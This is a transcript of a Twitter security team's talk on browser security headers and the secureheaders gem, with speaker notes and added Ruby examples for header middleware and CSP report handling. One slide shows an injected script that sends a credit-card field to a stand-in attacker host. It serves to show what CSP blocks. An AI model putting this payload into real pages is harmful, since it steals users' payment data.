2013: OC Rails Jan - SecureHeaders library and content security policy

Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the application

  • Hello AppSec USA. My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
  • Talk about http basic authorization
  • Many of these headers not only encourage best practices but also provide a better user experience and save resources
  • Take a survey
  • save resources since nothing is framed
  • Twitter has had clickjacking problems in the past. While xfo does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
  • hsts preload and max-age
  • Explain how redirecting to HTTPS doesn’t protect the initial request. Saves a round trip.
  • Explain mixed content: MITM of assets, Firesheep, cookies sent in the clear. Supported in WebKit (PhantomJS). Accepting arbitrary HTML is safe because inserted scripts won’t execute: on* event handlers, javascript: URIs; restrict the use of eval.
  • A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful XSS attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and by a variety of one-off methods.
  • strings or hashes
  • Yeah, some browsers protect you, but not all support it
  • Content security policy defines what can "run" on a page, and any deviation creates an alert. Twitter was an early adopter. We saw that this could not only potentially protect our users, but also give us a large number of data points about what the user is experiencing. We have used CSP to help detect XSS and mixed content by leveraging the reports sent to us by the users' browsers. This complements the static and dynamic analysis provided by Brakeman and phantom-gang in a unique way, as we are receiving information from the user. We send the CSP reports to a central Scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to the Hadoop file system, which we can run "big data" reports against using Pig/Scalding. We send this information to SADB where we can search and sort more easily.

Presentation Transcript

  • Not your typical Rails security talk. Header use @ Twitter. @ocrails, January 30, 2013. @ocrails | @ndm
  • What are headers?
  • Wait, not those ones.
  • OK, but what are browser headers?
    Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
    Accept: text/plain
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
  • Response headers
    Cache-Control: max-age=3600
    ETag: "737060cd8c284d8af7ad3082f209582d"
    Location: http://www.w3.org/pub/WWW/People.html
  • I’m already bored. Time to get awesomer.
  • Security headers: leverage the browser for security.
  • Sweeeeet. I don’t have to write secure code!
  • Time of convergence
  • Should you?
  • Do you use these?
    Content Security Policy
    X-Frame-Options
    HTTP Strict Transport Security
    X-Xss-Protection
    X-Content-Type-Options
  • X-Content-Type-Options
    Fixes MIME sniffing attacks. Only applies to IE, because only IE would do something like this.
    X-Content-Type-Options: nosniff
    zzzzZZZZZZzzzzz
  • X-Xss-Protection
    Use the browser’s built-in XSS Auditor.
    X-Xss-Protection: [0-1](; mode=block)?
    X-Xss-Protection: 1; mode=block
    (SCREENSHOT OF BLOCKED SCRIPT)
    zzzzZZZ... huh? zzzzzzzz
  • X-Frame-Options
    Protects you from most classes of clickjacking.
    X-Frame-Options: DENY
    X-Frame-Options: SAMEORIGIN
    X-Frame-Options: ALLOW-FROM example.com
    zzz... oh hey, that’s cool. Don’t frame my stuff.
  • X-Frame-Options @owaspoc Jan 2013 @ndm | @presidentbeef
  • Firesheep / SSL Strip
    Given I haven’t received an HSTS header
    And I have a session
    When I visit http://example.com
    Then I am pwned
  • Other SSL fails
    Posting passwords over HTTP
    Loading mixed content
    Using protocol-relative URLs
  • Strict Transport Security
  • How hard is it to use?
    Base case:
    Strict-Transport-Security: max-age=10000000
    Do all of your subdomains support SSL?
    Strict-Transport-Security: max-age=10000000; includeSubDomains
    (SSL FOR DUMMIES PICTURE)
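As an added example (my own code, not the secureheaders gem's and not from the slides), here is a minimal Rack middleware in plain Ruby that applies the non-CSP headers covered so far. It sets Strict-Transport-Security only on HTTPS responses, since browsers ignore the header when it arrives over plain HTTP, which is why the initial request is never protected by a redirect alone. The class name SecurityHeaders, the option keys and the default values are assumptions made for this example.

```ruby
# Added example: Rack middleware applying X-Frame-Options, X-Content-Type-Options,
# X-XSS-Protection and (on HTTPS only) Strict-Transport-Security. No dependency on
# the rack gem so it runs stand-alone; the env keys used are the standard Rack ones.
class SecurityHeaders
  # Assumed defaults for this example; the real gem's defaults may differ.
  DEFAULTS = {
    'X-Frame-Options'        => 'SAMEORIGIN',
    'X-Content-Type-Options' => 'nosniff',
    'X-XSS-Protection'       => '1; mode=block'
  }.freeze

  # options[:headers] overrides any default; options[:hsts] is
  # { max_age: seconds, include_subdomains: true/false } or nil to disable HSTS.
  def initialize(app, options = {})
    @app     = app
    @headers = DEFAULTS.merge(options.fetch(:headers, {}))
    @hsts    = options.fetch(:hsts, { max_age: 10_000_000, include_subdomains: false })
  end

  def call(env)
    status, headers, body = @app.call(env)
    # Do not clobber a header the application set deliberately for this response.
    @headers.each { |name, value| headers[name] = value unless headers.key?(name) }
    # HSTS is only meaningful on a response the browser received over TLS.
    headers['Strict-Transport-Security'] = hsts_value if @hsts && https?(env)
    [status, headers, body]
  end

  def hsts_value
    value = "max-age=#{@hsts[:max_age]}"
    value += '; includeSubDomains' if @hsts[:include_subdomains]
    value
  end

  private

  # Trusting X-Forwarded-Proto assumes a front proxy that overwrites any
  # client-supplied copy of that header.
  def https?(env)
    return true if env['rack.url_scheme'] == 'https' || env['HTTPS'] == 'on'
    env['HTTP_X_FORWARDED_PROTO'].to_s.split(',').first.to_s.strip == 'https'
  end
end

if __FILE__ == $PROGRAM_NAME
  app = ->(_env) { [200, { 'Content-Type' => 'text/html' }, ['ok']] }
  wrapped = SecurityHeaders.new(app, hsts: { max_age: 10_000_000, include_subdomains: true })
  _, headers, _ = wrapped.call('rack.url_scheme' => 'https')
  headers.each { |k, v| puts "#{k}: #{v}" }
end
```

Mounting it as `use SecurityHeaders, hsts: { max_age: 10_000_000, include_subdomains: true }` in a Rack or Rails stack gives every response the headers; the per-response `key?` check keeps an action's own `X-Frame-Options: ALLOW-FROM` intact.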
  • Content secur-a-wat?
    Content Security Policy is reshaping the security model.
    It is a complicated spec with great differences across browsers.
    It is not widely adopted.
    However,
    It completely eliminates reflected and stored XSS.
    It ensures that you never load mixed content.
    It can protect users with infected browsers.
    It allows you to accept arbitrary HTML code from users.
  • Wat? Sounds cool.
    x-webkit-csp:
    script-src
    style-src
    img-src
    default-src
    frame-src
    connect-src
    font-src
    media-src
    object-src
    report-uri
  • (Embedded video slide; no transcript text)
  • Get rid of XSS, eh?
    A script-src directive that doesn’t contain ‘unsafe-inline’ almost eliminates most forms of cross site scripting.
    I WILL NOT WRITE INLINE JAVASCRIPT (written seven times)
  • (Image slide; no transcript text)
  • But I have to...
    OK, then I’ll inject:
    <script> var image = new Image(); image.src = “cyberhacker.com/steal?data=” + $(‘#credit_card’).val(); </script>
    FALSE! img-src violation, no XHR allowed
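To make the two slides above concrete, here is an added example (my own code, not the secureheaders gem's): it serializes a policy hash into a CSP header value and evaluates what that policy would let the page do. The source matching is a simplified reading of the CSP source-list rules ('self', 'none', scheme-only sources, host sources with an optional "*." wildcard and an explicit port), enough for the slide's scenario but not a complete CSP implementation. The policy, the CDN host cdn.example.net and the page URL are constructed for the example; cyberhacker.com is the host from the slide.

```ruby
# Added example, not the gem's code: build a CSP header from a directive hash and
# check whether a given load would be permitted under it.
require 'uri'

# { 'script-src' => ["'self'", 'https://*.cdn.example.net'] } => "script-src 'self' https://*.cdn.example.net"
def csp_header(directives)
  directives.map { |name, sources| "#{name} #{sources.join(' ')}" }.join('; ')
end

# Does one source expression permit fetching `uri` from a page at `page`? Both are absolute URIs.
def source_matches?(source, uri, page)
  case source
  when "'none'" then false
  when "'self'" then uri.scheme == page.scheme && uri.host == page.host && uri.port == page.port
  when /\A'/ then false                                   # 'unsafe-inline' etc. never match a URL fetch
  when /\A[a-z][a-z0-9+.-]*:\z/i then uri.scheme.downcase == source.chomp(':').downcase
  else
    # host-source; a bare host inherits the page's scheme (simplification of the spec rule)
    s   = source.include?('://') ? source : "#{page.scheme}://#{source}"
    pat = URI.parse(s.sub('*.', 'wildcard.'))             # placeholder label so URI can parse the wildcard
    return false unless uri.scheme == pat.scheme
    host_ok = if s.include?('*.')
                uri.host.to_s.end_with?('.' + pat.host.delete_prefix('wildcard.'))
              else
                uri.host == pat.host
              end
    port_ok = pat.port == pat.default_port || uri.port == pat.port
    host_ok && port_ok
  end
end

# A fetch directive that is absent falls back to default-src.
def effective_sources(directives, directive)
  directives[directive] || directives['default-src'] || []
end

def csp_allows?(directives, directive, url, page_url)
  page = URI.parse(page_url)
  uri  = URI.parse(url)
  effective_sources(directives, directive).any? { |src| source_matches?(src, uri, page) }
end

# Inline <script> blocks run only when script-src (or its fallback) carries 'unsafe-inline'.
def inline_script_allowed?(directives)
  effective_sources(directives, 'script-src').include?("'unsafe-inline'")
end

# Constructed policy for the slide's scenario: our own origin plus an assumed CDN,
# nothing inline. An injected <script> is refused outright, and even a script that
# somehow ran could not exfiltrate via new Image() to a host outside img-src.
EXAMPLE_POLICY = {
  'default-src' => ["'self'"],
  'script-src'  => ["'self'", 'https://*.cdn.example.net'],
  'img-src'     => ["'self'", 'https://*.cdn.example.net'],
  'report-uri'  => ['/csp_report']
}.freeze

if __FILE__ == $PROGRAM_NAME
  page = 'https://example.com/welcome'
  puts csp_header(EXAMPLE_POLICY)
  puts "inline script allowed: #{inline_script_allowed?(EXAMPLE_POLICY)}"
  puts "image beacon to cyberhacker.com allowed: " \
       "#{csp_allows?(EXAMPLE_POLICY, 'img-src', 'http://cyberhacker.com/steal?data=x', page)}"
end
```

Note the fallback in `effective_sources`: connect-src is not listed in EXAMPLE_POLICY, so XHR and WebSocket connections inherit `default-src 'self'`, which is the "no XHR allowed" half of the slide's punchline.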
  • Inline CSS too? WTF?
  • Choose your own adventure
  • Apply all the headers!
  • How to apply? Secure headers! Open sourced earlier this month: https://github.com/twitter/secureheaders
  • How does it work?
    It sets a before_filter that applies each header.
    Values are based on options passed to the filter, or set in an initializer.
    Easily overridden.
    Secure by default!!!
  • What about that security policy thingy? There are > 6 differences between these two header values.
  • Yay for standards
  • Long hair don’t care about browser inconsistencies
  • Other features
    Set separate policies for http/https.
    Autofill chrome-extension: (becoming part of the spec).
    Auto fill missing directives with the default value (becoming part of the spec).
  • You mean there’s more on CSP? The browser sends reports!
  • What does the report look like?
    { "csp-report" => { "document-uri" => "http://localhost:3000/home", "referrer" => "", "blocked-uri" => "ws://localhost:35729/livereload", "violated-directive" => "xhr-src ws://localhost.twitter.com:*" } }
  • Quiz: what does this report indicate?
    { "csp-report" => { "document-uri" => "http://example.com/welcome", "referrer" => "", "blocked-uri" => "self", "violated-directive" => "inline script base restriction", "source-file" => "http://example.com/welcome", "script-sample" => "alert(1)", "line-number" => 81 } }
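The two reports above are worth more than a quiz answer: at scale you want them normalized and bucketed automatically. The following is an added example (my own code, not the secureheaders gem's) that parses reports as they arrive at a report-uri endpoint, maps the old Firefox directive names onto the standard ones (the xhr-src/connect-src and allow/default-src mapping is my assumption for illustration) and classifies each report. REPORT_LIVERELOAD and REPORT_INLINE are the two reports from the slides rewritten as JSON; REPORT_MIXED is constructed to show the mixed-content case the speaker notes mention.

```ruby
# Added example, not the gem's code: normalize CSP violation reports from both
# browser dialects and sort them into buckets an on-call engineer cares about.
require 'json'

# Old Firefox (X-Content-Security-Policy) directive names mapped to the standard
# ones so reports from both dialects land in one bucket. Assumed mapping.
DIRECTIVE_ALIASES = { 'xhr-src' => 'connect-src', 'allow' => 'default-src' }.freeze

# Sample input: the first report from the slides (livereload websocket blocked).
REPORT_LIVERELOAD = <<~JSON
  {"csp-report": {"document-uri": "http://localhost:3000/home", "referrer": "",
   "blocked-uri": "ws://localhost:35729/livereload",
   "violated-directive": "xhr-src ws://localhost.twitter.com:*"}}
JSON

# Sample input: the quiz report from the slides (inline script refused).
REPORT_INLINE = <<~JSON
  {"csp-report": {"document-uri": "http://example.com/welcome", "referrer": "",
   "blocked-uri": "self", "violated-directive": "inline script base restriction",
   "source-file": "http://example.com/welcome", "script-sample": "alert(1)", "line-number": 81}}
JSON

# Constructed sample: an https page pulling a stylesheet over plain http.
REPORT_MIXED = <<~JSON
  {"csp-report": {"document-uri": "https://example.com/home", "referrer": "",
   "blocked-uri": "http://static.example.net/site.css", "violated-directive": "style-src https:"}}
JSON

# Flatten one report into a hash with a dialect-independent directive name.
def normalize_report(json)
  r    = JSON.parse(json).fetch('csp-report')
  raw  = r['violated-directive'].to_s
  name = raw.split(' ').first.to_s
  {
    document:      r['document-uri'].to_s,
    blocked:       r['blocked-uri'].to_s,
    directive:     DIRECTIVE_ALIASES.fetch(name, name),
    raw_directive: raw,
    sample:        r['script-sample'],
    line:          r['line-number']
  }
end

def classify(report)
  if report[:raw_directive].include?('inline script') ||
     (report[:directive] == 'script-src' && report[:blocked] == 'self')
    :inline_script   # a script with no source the page served: XSS candidate, or a dev ignoring the rule
  elsif report[:document].start_with?('https://') && report[:blocked].start_with?('http://')
    :mixed_content   # the page is https but tried to load an http asset
  elsif report[:blocked].include?('localhost')
    :dev_tooling     # livereload websockets and friends: noise, not an attack
  else
    :other
  end
end

# Count reports per bucket, the shape you would push to a dashboard or alert on.
def triage(jsons)
  jsons.each_with_object(Hash.new(0)) { |j, counts| counts[classify(normalize_report(j))] += 1 }
end

if __FILE__ == $PROGRAM_NAME
  [REPORT_LIVERELOAD, REPORT_INLINE, REPORT_MIXED].each do |j|
    r = normalize_report(j)
    puts "#{classify(r)}: #{r[:directive]} blocked #{r[:blocked]} on #{r[:document]}"
  end
end
```

In report-only mode (the next slide's experimentation setting) the same classifier tells you how much legitimate traffic a candidate policy would break before you switch it to enforce; the :inline_script bucket is the one to page on, the :dev_tooling bucket the one to drop at the collector.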
  • Header gem to the rescue
    It forwards CSP reports for Firefox.
    It makes setting an enforce and a report-only mode easy for experimentation.
  • Monitor and tune ALL the things
  • Splunk
  • Trending and anomalies
  • CSP, Phantom Gang, ThreatDeck, Brakeman, Roshambo. Email developers. Email security@
  • Who wants to buy me a beer?